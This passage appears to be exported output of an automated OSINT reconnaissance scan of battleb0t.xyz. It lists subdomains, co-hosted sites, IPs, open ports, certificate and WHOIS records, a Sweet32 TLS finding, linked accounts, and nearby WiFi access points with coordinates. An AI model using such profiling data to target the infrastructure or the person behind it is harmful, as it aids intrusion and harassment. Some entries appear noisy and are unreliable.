"{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=VywvBB1i7auboS6du2SyYTMISxYgv0SAv9G2irfzrfSoLR0rWIxDql%2BDKBWgGtLF7kP8CwfOUwVMXmcuqTKfEc1L%2Fjta42Of8JEwGnOgDhCKAOR2s74ejvfrFg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5eeb1a42bf-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | TEKER PERFORMANS (Net ID: 00:13:33:8D:5A:FE) | 40.2024, 29.0398 |
| 2023-05-12 02:57:03 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://www.ibisci.com/products/the-spin-dr-tube-rotator?_kx=vizvI-JRPBLiz2WSUolyRzD4z1y8jXdUi3K-8u9VCZS89GBYZ3jti4Wh6njSNfNu.MenwDE&_pos=1&_sid=e69e48d55&_ss=r&utm_campaign=10.17.22%20-%20Spin%20Dr%20Video%20%282022-10-17%29&utm_medium=email&utm_source=Subscribers%20%28Customers%20and%20non-customers%29&variation=B', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "ico-select_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "TarC703.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_684_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_684_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_684_IESQMMUTEX_0_519"\n "IsoScope_684_IESQMMUTEX_0_303"\n "IsoScope_684_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1668"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesCacheCounterMutex"\n "UpdatingNewTabPageData"\n "IsoScope_684_ConnHashTable<1668>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_684_IE_EarlyTabStart_0xfe4_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_684_IESQMMUTEX_0_519"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"23.227.38.74:443"\n "172.253.115.95:443"\n "104.17.24.14:443"\n "162.159.135.68:443"\n "142.251.16.95:443"\n "31.13.70.7:443"\n "104.21.88.99:443"\n "18.155.181.15:443"\n "35.229.48.116:443"\n "162.159.129.71:443"\n "142.251.16.94:443"\n "142.251.163.102:443"\n "172.217.2.110:443"\n "162.159.138.60:443"\n "142.251.163.155:443"\n "157.240.19.35:443"\n "157.240.19.26:443"\n "172.253.122.155:443"\n "142.251.163.149:443"\n "142.250.73.225:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"apps-uso.netlify.app"\n "cdn.shopify.com"\n "cdnjs.cloudflare.com"\n "in.visitors.live"\n "qab.hextom.com"\n "settings.luckyorange.net"\n "visitors.live"\n "www.ibisci.com"\n "www.pxucdn.com"\n "www.webyze.com"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "FNIZQ81G.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\FNIZQ81G.txt]- [targetUID: 00000000-00003144]\n Dropped file: "YQ267VSL.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\YQ267VSL.txt]- [targetUID: 00000000-00003144]\n Dropped file: "OP4TNIKT.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OP4TNIKT.txt]- [targetUID: 00000000-00003144]\n Dropped file: "7XYK1WC8.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7XYK1WC8.txt]- [targetUID: 00000000-00003144]\n Dropped file: "0PG5YZ7F.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\0PG5YZ7F.txt]- [targetUID: 00000000-00003144]\n Dropped file: "CFKG5CLE.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CFKG5CLE.txt]- [targetUID: 00000000-00003144]\n Dropped file: "EX0SJD32.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\EX0SJD32.txt]- [targetUID: 00000000-00003144]\n Dropped file: "SI0NUM7L.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SI0NUM7L.txt]- [targetUID: 00000000-00003144]\n Dropped file: "KCA9UIC0.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\KCA9UIC0.txt]- [targetUID: 00000000-00003144]\n Dropped file: "H88ZOVT1.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\H88ZOVT1.txt]- [targetUID: 00000000-00003144]\n Dropped file: "HJIXL0AW.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\HJIXL0AW.txt]- [targetUID: 00000000-00003144]\n Dropped file: "4A84WL3Z.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\4A84WL3Z.txt]- [targetUID: 00000000-00003144]\n Dropped file: "HLMAT6CX.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\HLMAT6CX.txt]- [targetUID: 00000000-00003144]\n Dropped file: "I9D9AAFE.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\I9D9AAFE.txt]- [targetUID: 00000000-00003144]\n Dropped file: "0ZBM6C0E.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\0ZBM6C0E.txt]- [targetUID: 00000000-00003144]\n Dropped file: "Q7Z941OM.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\Q7Z941OM.txt]- [targetUID: 00000000-00003144]\n Dropped file: "CKUE1YAL.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CKUE1YAL.txt]- [targetUID: 00000000-00003144]\n Dropped file: "ZY1RZW68.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZY1RZW68.txt]- [targetUID: 00000000-00003144]\n Dropped file: "DNZGTUBL.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\DNZGTUBL.txt]- [targetUID: 00000000-00003144]\n Dropped file: "X5KQRM7V.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\X5KQRM7V.txt]- [targetUID: 00000000-00003144]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabC6F0.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62397 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "CabC702.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62397 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62397 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "ico-select_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "FNIZQ81G.txt" has type "ASCII text with very long lines"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\FNIZQ81G.txt]- [targetUID: 00000000-00003144]\n "YQ267VSL.txt" has type "ASCII text with very long lines"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\YQ267VSL.txt]- [targetUID: 00000000-00003144]\n "OP4TNIKT.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OP4TNIKT.txt]- [targetUID: 00000000-00003144]\n "hCqgMXugxYV_7yMwWzW3hH2RpGpkXJCcfgSKJizSQFw_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "7cH1v4okm5zmbvwkAx_sfcEuiD8jPvWsOdC5_1_.woff" has type "Web Open Font Format TrueType length 19208 version 1.1"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003144]\n "quickannouncementbar_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "sdk_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "api.jquery-e94e010e92e659b566dbc436fdfe5242764380e00398907a14955ba301a4749f_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "KFOlCnqEu92Fr1MmEU9fBBc-_1_.woff" has type "Web Open Font Format TrueType length 20012 version 1.1"- [targetUID: N/A]\n "redirect-app_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "shop_events_listener-65cd0ba3fcd81a1df33f2510ec5bcf8c0e0958653b50e3965ec972dd638ee13f_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "7cH3v4okm5zmbtYtMeA0FKq0Jjg2drF0feC9hpk_1_.woff" has type "Web Open Font Format TrueType length 19932 version 1.1"- [targetUID: N/A]\n "0SljmOUUHURP_y3FUALXiFiF5YoIw6lFyjq_newAlf4_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "TarC703.tmp" has type "data"- Location: [%TEMP%\\TarC703.tmp]- [targetUID: 00000000-00003144]\n "all_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "7XYK1WC8.txt" has type "ASCII text with very long lines"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7XYK1WC8.txt]- [targetUID: 00000000-00003144]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'File/Mem | 35.229.48.116 |
| 2023-05-12 03:03:47 | Co-Hosted Site | No | ThreatMiner | 2 | 0 | 2 | 0 | None | rathook.cc | 185.199.111.153 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Intel Gateway (Net ID: 00:02:B3:A5:C9:64) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Keybase (Category: social)
https://keybase.io/login | login |
| 2023-05-12 03:01:33 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.83): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:03:38 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00yongshiwangzi.github.io |
| 2023-05-12 02:46:03 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 3 | 0 | None | {u'city': u'North Charleston', u'security': {u'is_vpn': False}, u'city_geoname_id': 4589387, u'region_geoname_id': 4597040, u'country': u'United States', u'region': u'South Carolina', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'GOOGLE-CLOUD-PLATFORM', u'isp_name': u'Halliburton Company', u'organization_name': u'Halliburton Company', u'autonomous_system_number': 396982}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'29415', u'longitude': -79.9746, u'country_code': u'US', u'timezone': {u'abbreviation': u'EDT', u'gmt_offset': -4, u'is_dst': True, u'name': u'America/New_York', u'current_time': u'22:46:02'}, u'latitude': 32.8608, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'34.148.97.127', u'continent': u'North America', u'region_iso_code': u'SC'} | 34.148.97.127 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom (Net ID: 00:0C:F6:37:01:3C) | 50.8897, 6.0563 |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0001vrn.github.io | 185.199.111.153 |
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | MCUUID (Minecraft) (Category: gaming)
https://mcuuid.net/?q=battleb0t | battleb0t |
| 2023-05-12 03:08:49 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.114 | 35.229.48.116 |
| 2023-05-12 03:00:56 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00p513-dev.github.io | 185.199.111.153 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 3Com (Net ID: 00:04:75:62:7A:78) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Let's Encrypt,CN=R3 | battleb0t.xyz |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | herron-libson (Net ID: 00:01:24:F1:75:B2) | 37.780462,-122.390564 |
| 2023-05-12 03:00:22 | Raw Data from RIRs | No | Certificate Transparency | 1 | 0 | 2 | 0 | None | [{u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.489', u'id': 9021136086}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.221', u'id': 9002142810}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.523', u'id': 8910975043}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.327', u'id': 8879939167}, {u'not_after': u'2023-04-27T17:58:42', u'not_before': u'2023-01-27T17:58:43', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0353521f2268d4e4bd04c1ea37aeda35a438', u'entry_timestamp': u'2023-01-27T18:58:43.373', u'id': 8595002735}, {u'not_after': u'2023-04-27T17:58:42', u'not_before': u'2023-01-27T17:58:43', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0353521f2268d4e4bd04c1ea37aeda35a438', u'entry_timestamp': u'2023-01-27T18:58:43.278', u'id': 8512878872}, {u'not_after': u'2023-03-18T21:24:58', u'not_before': u'2022-12-18T21:24:59', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'036227a6dc1628deaea0a47d7ea00281250e', u'entry_timestamp': u'2022-12-18T22:24:59.851', u'id': 8238674246}, {u'not_after': u'2023-03-18T21:24:58', u'not_before': u'2022-12-18T21:24:59', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'036227a6dc1628deaea0a47d7ea00281250e', u'entry_timestamp': u'2022-12-18T22:24:59.092', u'id': 8232262063}] | kekw.battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | CH2SC6TY (Net ID: 00:16:46:71:5C:B0) | 32.8608, -79.9746 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Twitter (Category: social)
https://twitter.com/ayshoo | ayshoo |
| 2023-05-12 03:12:41 | Vulnerability - CVE High | Yes | Tool - testssl.sh | 0 | 2 | 2 | 0 | None | CVE-2016-2183
https://nvd.nist.gov/vuln/detail/CVE-2016-2183
Score: 7.5
Description: The DES and Triple DES ciphers, as used in the TLS, SSH, and IPSec protocols and other protocols and products, have a birthday bound of approximately four billion blocks, which makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTPS session using Triple DES in CBC mode, aka a "Sweet32" attack. | 188.114.97.1 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | DTT (Net ID: 00:02:2D:2C:9F:8D) | 34.0544, -118.244 |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:143 | 87.248.157.102 |
| 2023-05-12 03:24:29 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 5 | 0 | None | Nics Telekomunikasyon Ltd. | Domain Name: KEYUBU.NET
Registry Domain ID: 2292564483_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.nicproxy.com
Registrar URL: http://https://nicproxy.com/
Updated Date: 2022-07-15T17:58:49Z
Creation Date: 2018-07-31T21:39:25Z
Registry Expiry Date: 2024-07-31T21:39:25Z
Registrar: Nics Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90 212 213 2963
Domain Status: ok https://icann.org/epp#ok
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: KEYUBU.NET
Registry Domain ID : 2292564483_DOMAIN_NET-VRSN
Registrar WHOIS Server : whois.nicproxy.com
Registrar URL: http://www.nicproxy.com
Updated Date: 2022-07-15T17:58:49Z
Creation Date: 2018-07-31T21:39:25Z
Registrar Registration Expiration Date: 2024-07-31T21:39:25Z
Registrar: NICS Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90.2122132963
Reseller: CIZGI TELEKOMUNIKASYON A.S - NATRO
Domain Status: ok http://www.icann.org/epp#OK
Registry Registrant ID: CID-Redacted for Privacy
Registrant Name: Redacted for Privacy
Registrant Organization: Redacted for Privacy
Registrant Street: Redacted for Privacy
Registrant City: ADANA
Registrant State / Province: Redacted for Privacy
Registrant Postal Code: Redacted for Privacy
Registrant Country: TR
Registrant Phone: Redacted for Privacy
Registrant Phone Ext: Redacted for Privacy
Registrant Fax: Redacted for Privacy
Registrant Fax Ext: Redacted for Privacy
Registrant Email: https://whoisshelter.nicproxy.com/?d=KEYUBU.NET
Registry Admin ID: CID-Redacted for Privacy
Admin Name: Redacted for Privacy
Admin Organization: Redacted for Privacy
Admin Street: Redacted for Privacy
Admin City: Redacted for Privacy
Admin State / Province: Redacted for Privacy
Admin Postal Code: Redacted for Privacy
Admin Country: Redacted for Privacy
Admin Phone: Redacted for Privacy
Admin Phone Ext: Redacted for Privacy
Admin Fax: Redacted for Privacy
Admin Fax Ext: Redacted for Privacy
Admin Email: Redacted for Privacy
Registry Tech ID: CID-Redacted for Privacy
Tech Name: Redacted for Privacy
Tech Organization: Redacted for Privacy
Tech Street: Redacted for Privacy
Tech City: Redacted for Privacy
Tech State / Province: Redacted for Privacy
Tech Postal Code: Redacted for Privacy
Tech Country: Redacted for Privacy
Tech Phone: Redacted for Privacy
Tech Phone Ext: Redacted for Privacy
Tech Fax: Redacted for Privacy
Tech Fax Ext: Redacted for Privacy
Tech Email: Redacted for Privacy
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: Unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>>Last update of WHOIS database: 2023-05-12T02:59:37Z<<<
For more information on Whois status codes, please visit https://icann.org/epp
IMPORTANT: Port43 will provide the ICANN-required minimum data set per
ICANN Temporary Specification, adopted 04 Jun 2018.
Visit whois.nicproxy.com to look up contact data for domains
not covered by GDPR policy.
!****************************************************************************!
NICS Telekomunikasyon A.S., uluslararasi alan adi kayit otoritesi olan ICANN
onayli bir alan adi kayit firmasidir.
Bu alan adina ait web sitesinin icerigi ya da yayinlanmasiyla hicbir sekilde ilgisi yoktur.
Sadece, ICANN kurallari cercevesinde alan adinin kayit edilmesine aracilik yapmaktadir.
Bu alan adi sahibinin kayit sirasinda verdigi bilgiler yukaridaki gibidir.
NICS Telekomunikasyon A.S., bu bilgilerin dogrulugunu garanti edemez.
Daha fazla bilgi almak icin info [at] nicproxy.com adresine yazabilirsiniz.
!*****************************************************************************!
The data in the WHOIS database of NICS Telekomunikasyon A.S. is provided by
Nics Telekomunikasyon Ltd. for information purposes, and to assist persons in
obtaining information about or related to domain name registration
records. NICS Telekomunikasyon A.S. does not guarantee its accuracy.
By submitting a WHOIS query, you agree that you will use this data
only for lawful purposes and that, under no circumstances, you will
use this data to
1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via E-mail(spam) or
2) enable high volume, automated, electronic processes that apply
to Nics Telekomunikasyon Ltd. or its systems.
Nics Telekomunikasyon Ltd. reserves the right to modify these terms.
By submitting this query, you agree to abide by this policy.
NICProxy Whois Server Ver.1.2.2
|
| 2023-05-12 02:54:13 | HTTP Headers | No | Web Spider | 8 | 0 | 3 | 0 | None | {"content-length": "103646", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-63a06\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-ewr18167-EWR", "x-cache": "MISS", "x-github-request-id": "70D2:0CB6:1A723F4:28AE86F:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "4232179a2468cad7d8e788f0a4fe958396bfc091", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.050131,VS0,VE21", "server": "GitHub.com", "connection": "keep-alive", "content-type": "application/javascript; charset=utf-8"} | https://battleb0t.xyz/main.built.js |
| 2023-05-12 03:10:03 | Affiliate - Internet Name | No | DNS Resolver | 10 | 0 | 4 | 0 | None | baffin.netcraft.com | 207.154.228.159 |
| 2023-05-12 02:44:22 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.108.153 |
| 2023-05-12 03:32:06 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.4:8443 | 188.114.97.0/24 |
| 2023-05-12 02:54:20 | Web Content Type | No | Web Spider | 0 | 0 | 4 | 0 | None | text/css | http://nuke.battleb0t.xyz/cdn-cgi/styles/main.css |
| 2023-05-12 03:01:32 | Raw Data from RIRs | No | Tool - WhatWeb | 1 | 0 | 3 | 0 | None | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://vscode.battleb0t.xyz', u'http_status': 521, u'plugins': {u'HTTPServer': {u'string': [u'cloudflare']}, u'Script': {}, u'Country': {u'string': [u'UNITED STATES'], u'module': [u'US']}, u'Title': {u'string': [u'vscode.battleb0t.xyz | 521: Web server is down']}, u'HTML5': {}, u'UncommonHeaders': {u'string': [u'referrer-policy,cf-ray']}, u'IP': {u'string': [u'104.21.71.14']}, u'X-Frame-Options': {u'string': [u'SAMEORIGIN']}, u'X-UA-Compatible': {u'string': [u'IE=Edge']}}}, {}] | vscode.battleb0t.xyz |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | fotka (Category: social)
https://fotka.com/profil/login | login |
| 2023-05-12 03:08:50 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.122 | 35.229.48.116 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | AMX (Net ID: 00:02:E3:40:F7:BD) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:01:17 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.151): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
